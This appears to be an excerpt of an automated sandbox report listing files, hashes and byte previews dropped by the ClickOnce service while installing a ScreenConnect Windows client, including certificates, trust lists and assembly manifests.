                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):71954
                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                        Malicious:false
                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:Certificate, Version=3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1716
                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                        Malicious:false
                                                                                                                        Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):727
                                                                                                                        Entropy (8bit):7.5877833615826
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:5onfZpqc5RlRtBfQTqAsrUvF+5AcoVm6DOB1qgszZpuRa7Aaq3hvCG8+UxS+3xd:5iicdZ9AQOFwfo4JmZqhaqVE+0b
                                                                                                                        MD5:19818DDCAC7E6D84EDDA2D202A8BD6F5
                                                                                                                        SHA1:078A354358A3AB745489EC949E64E71B73F800A7
                                                                                                                        SHA-256:376FD6FEC42BA09D21B131410EBD956B6C768597D3BBA28D120060CA8F8CA64C
                                                                                                                        SHA-512:646010EA61958A0AF74CF6BF53623FDC233291CDB309B7D92DFC1CCE33444E57C693C3186B54AC7E082106FE02A48FAEFC02FF647A5EB09FC2B945F12D0DF36B
                                                                                                                        Malicious:false
                                                                                                                        Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241112184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241112184215Z....20241119184215Z0...*.H.............%.'.O..$.)...$v.w.?..L..........]./.Y..r.O.ER..5..E.6i..n..7E.Z.8Cp....B..ml.....}...!.t.....>...+.P..fM.z\....qM v_...E]...1.y.Qu..N.._.s..a.S.g........W...:..0...$...b...._M.[.$.Y..>...G..~R....0U-...y..}.F..t.n|.o....q(%6...I`.._6.eW.:....Ij.........|.>n.h..b..r...?u.....)...0{.U.\.....>....Xb.R.6.im.o.et._\$Qr..;..`..Q..a.J...j.WD.>...>.....O..Tw.hX..Y..._.e#.R.1._\.....i...'*_..s....M.a.X.$.....V{...3....%...x./.'x.\.Q|h8'.E~Y>..K.B&/..0..(....:9:p....g.6.........7..V.`.Q.bj.Yd8
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:Certificate, Version=3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1428
                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                        Malicious:false
                                                                                                                        Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):338
                                                                                                                        Entropy (8bit):3.4465202453435166
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:kK2x+E48w3htsJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:u8J3hBkPlE99SCQl2DUevat
                                                                                                                        MD5:BD31FA6D35D593EC7D706AB48F5536F3
                                                                                                                        SHA1:23A8130CB201D3891EEFBA4EDD0C26D7F9BE799D
                                                                                                                        SHA-256:C1BF04DC571A5DE8B3A31FA17E6E704955B5FE501A27AA26C35E47810CBB0873
                                                                                                                        SHA-512:3D5567910CD4A80EFD6DCA269FCEA3AF653104A255033D9E9FD0CD23ECD1468A2664C00D3CA323848E3116730B1AB360BFB50054BF3BC05E7F74FE78B45D73CA
                                                                                                                        Malicious:false
                                                                                                                        Preview:p...... ........A*...7..(...............................................x(..v6.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):328
                                                                                                                        Entropy (8bit):3.245596380966818
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:kKep/99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:G2DImsLNkPlE99SNxAhUe/3
                                                                                                                        MD5:037AC82BC2F815589F4F8C169B6D38CA
                                                                                                                        SHA1:31E977A130450BF6EBBADC006552FCAAE9F55618
                                                                                                                        SHA-256:11F945D6C21A710EE0FAE3317023648CF5174DFF8C90FEF3F28387E3A4425EC6
                                                                                                                        SHA-512:5AA29870AE4F3B99AD4C82F0CBCEA98D57B0DE36056FF1B52F177E3BA89B7019F876F02E7EF75F0E369C1FD06CE61712CE0A30EB12EF78E05D97A2BE04A34AEC
                                                                                                                        Malicious:false
                                                                                                                        Preview:p...... ........SgA<16..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):308
                                                                                                                        Entropy (8bit):3.1981056925460676
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:kKVcFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:9DtWOxSW0P3PeXJUZY
                                                                                                                        MD5:C3A296AD3FF7958A97DFE26D570A1E35
                                                                                                                        SHA1:2BB218B9A587BDB2266535039F178540FB22DB3D
                                                                                                                        SHA-256:F8C6DF886F3B6E47396F3F1518560AD2D9A5477996FBCBFC37AB594EFE99F65C
                                                                                                                        SHA-512:42497AFB68B1907393B3D2E92A7F0167732D4999FE025EF5923EF95BA97C1669B89FAE8B7F4ED38023FF1805F7638BE4A021357E8070EC74CBC07372081B4AB6
                                                                                                                        Malicious:false
                                                                                                                        Preview:p...... ........M..iK6..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):412
                                                                                                                        Entropy (8bit):3.9734622103410793
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:kKscn3/MiSSfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:kK30KmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                        MD5:7A096BD10C338DCB4CBC76437CEDB698
                                                                                                                        SHA1:9E2E4C352B09F0BD0FD0CA663FBB3901CA4FCB8D
                                                                                                                        SHA-256:A084B978F00BE0B3EADFB9CA95AAA224FBE2F5C2FB510BC81E4B021BAB5FB50A
                                                                                                                        SHA-512:080FC268142EE85D5247023FAF3E15F2F8402F5F2E9520AFC06F7FFACF239AAABEF2AEDDC6FE48CD01A0F72A5D0B89A722BDA9E2325E791273CF88EB0BD35072
                                                                                                                        Malicious:false
                                                                                                                        Preview:p...... ....(.....Cg@6..(................].25.......:.......................:.. ........f...5.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):254
                                                                                                                        Entropy (8bit):3.0106805074239693
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:kKMLpLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:oLYS4tWOxSW0PAMsZp
                                                                                                                        MD5:5B45023FD14D4E66366E9AAF5441E0DD
                                                                                                                        SHA1:9E3A8CDC03C8A651C790CE5F7269382F6937A3BA
                                                                                                                        SHA-256:3B28F93FF3DF9AE14EB4FD8B4B6B9EF894EFFE0743F1706BE4474C3660518377
                                                                                                                        SHA-512:22F0E8F7DA9811E5EF4ACDD7F14B61D49EC7EB71CAC25CFD77834D0A5E2C699F1946C90B8FB77AF04E4A22C15AD012B5D122BEA02D9A56AA7EA0D9ACE7F63207
                                                                                                                        Malicious:false
                                                                                                                        Preview:p...... ....l......-&6..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):25496
                                                                                                                        Entropy (8bit):5.630217411128599
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:KOrqEitGnph6LOX9jX9R/QPIBM7Y3pzfyT9H8ujZoYzfxut:KnZ8n6LOX9jX9R/QPI+0Zzf+9Jn5ut
                                                                                                                        MD5:8E168C69918DBA686178D572957392B3
                                                                                                                        SHA1:164A72DA95F111B45C4CC2E6C0ED438154ACF953
                                                                                                                        SHA-256:F718703909193D4CCABF92F57AB5730A22FC0E569BD4C2B92304AD8E4A793D25
                                                                                                                        SHA-512:A5B7E4584012F89818B06D32F66305BA66220075CDACAC83BC5FDE6441030ACA514386E38555F723013BA96AD5C6FC5C4A3DFA0F12C7D1996558EE6873EBA3A6
                                                                                                                        Malicious:false
                                                                                                                        Preview:PcmH...........7...bf.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$............?..]k.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K.....E..X.N....u..IV..R......D..S......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...O...T...W...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):17858
                                                                                                                        Entropy (8bit):5.96124399589564
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:rexTuzvdu98aXVEf6/DX9mX9FX9R/QPIYM7Y7:rn6/DX9mX9FX9R/QPIN07
                                                                                                                        MD5:7F68A01C2FEA1C80A75E287BB36D6B43
                                                                                                                        SHA1:F271EBC2542397E59C3D57D30CC54BF1D9DB4F69
                                                                                                                        SHA-256:2E0E46F395D5A6440F179B61C4008ABF3D72CFCDA705A543C8EE18B41D37B025
                                                                                                                        SHA-512:C6C1C9D6D9C50F94C9BC8C8A422CD00397EE184B6F6113EA19F9209C0E2339B540EE92D35BCCE81F242D6FDC3C720EC2E56675E702E90C91533A07FA9F9DB753
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.3.7.9067" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.3.7.9067" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3452
                                                                                                                        Entropy (8bit):4.216441076557447
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:GIE/eF7lMDWW+LgoQe6S+9owQX7gn7mL39KxqzGLI7QwKrIhIYX:GPWW9eV+WwQXUmL39KgGLI7QwKchIYX
                                                                                                                        MD5:16D4524684ECCD2069F5C6440A854A19
                                                                                                                        SHA1:E702484AD603202A15BC24D1345B87917AE27D8B
                                                                                                                        SHA-256:233D97B0D4BCD420569E7CEC68C29634EEA729EB6FB75EEE538875A9EAE657B7
                                                                                                                        SHA-512:7A498B0A6079B1B95AD16C521C8055A7DB0AD2237D2B71B4BB21CEFA575F315DA1AB2E58D6E16B764C63ECC5FBF683DAF0CD2E9B6A7F6D965DE0C826243AE3C6
                                                                                                                        Malicious:false
                                                                                                                        Preview:PcmH.........Q.#{...#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$............?..]k.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.3.7.9067%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1215
                                                                                                                        Entropy (8bit):5.1306699113418395
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AQavSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AQ2GVETDTo
                                                                                                                        MD5:293C100B1896E7532D241DAC2B32DCB3
                                                                                                                        SHA1:1E14B49C9AF799DA0371474BF712F3AC3E5B6EBC
                                                                                                                        SHA-256:AC3C489C02264FF1918FC0B79083A7754B98542A6CC4E2AF67EAFDBF76C6232E
                                                                                                                        SHA-512:ED3935D90F48043BE2BF7A60CACBB47964672EAB0C9EBFC2EEAC8EBC4341383F32F55901601DE56698EEF6AEC6399E77EB8DEC6F5158D1B3761D5F25ADFC3499
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):5256
                                                                                                                        Entropy (8bit):4.232110107327244
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:ESP+RxlyBeV+Ww7Nkg99K1kPHZ5H3Y8OngnsRK:URxlzJxg996Y55OQv
                                                                                                                        MD5:FE92E590C63F6CC03D9A75F18E67CE08
                                                                                                                        SHA1:EABCE87095AE9B6BE2D553DE614F936B9EA10443
                                                                                                                        SHA-256:E5238B1E83BF9AD5276BDBC8A2FD0C3C7D4FBDD5CF93A25D6E74A84600259F45
                                                                                                                        SHA-512:CB92F28ABC08E3FD8D6DE10E80BCFDC750195E68DE536ED0E93FBCFB662505610ADF6B5367DC4A736B92C299937C54A9DEDC32E5C017341BC6ABF70CE22EDB48
                                                                                                                        Malicious:false
                                                                                                                        Preview:PcmH........[B....+.4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$............?..]k.....[.......................z..w.....[~31.X......E..X.....s".I...R....C.........y..&..d."....B(.....#...^.ie...u&...F.....Ey)....+.`...m,......;../............... ...$...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$.......8...(...H.......p.......x...(...............................(.......................(... .......H.......P...(...`...................(.......................(...............d...........l.......................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1980
                                                                                                                        Entropy (8bit):5.057602063510745
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AQYvSkcyMQgcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AQ0HMQgGQAXRTFgTo
                                                                                                                        MD5:88ECD545BDBE3ED49C6A2B87589102EC
                                                                                                                        SHA1:E72949AF66B0A20E50474D2005E320BA63BA9B2B
                                                                                                                        SHA-256:D48AFB709E61B86EB6EEF67B41D0FA7EC780C4536F5CF9ACA7A0B440AED98EF0
                                                                                                                        SHA-512:7ED19ED32E02348ABC8A64CA0A21E05496A6595A8B94D3F960CF3F6A6C6445D30AAD7AEC09CE76776023F9E5F4B40DF032408DEFFBA102026247099879CB95DE
                                                                                                                        Malicious:false
                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.3.7.9067" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.3.7.9067" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):6584
                                                                                                                        Entropy (8bit):4.143798062220447
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:04GBPPbpvEeV+Wwwx8Wpm2TOtPO6gb6OL6IJrtNrn6qB/B:cPPxJxpmZPQb6OOgNr6k
                                                                                                                        MD5:F12A14D6D6DB9370ABF76D203C0CFE27
                                                                                                                        SHA1:2B0325418E00816BB60B6804E1937579CA21F0E5
                                                                                                                        SHA-256:AAF52D05A43C5AA4A6017E6E2F401D9FECD07631C248F67714E35CF760355D48
                                                                                                                        SHA-512:942410F7C6BB4ACEA78B16A186361E6F5300F303E82C68209634E3F058AA0380F04F78469D578714EA56FFEAB47197B6FE1D9745E585FA7EAF7DF59C7B967254
                                                                                                                        Malicious:false
                                                                                                                        Preview:PcmH.........Z.PBc..@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$............?..]k.........}'.d................z..w.....[~31.X......E..X.....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u)...O.&r..Vz,...F.....Ey/...[s.T..<2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...`...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
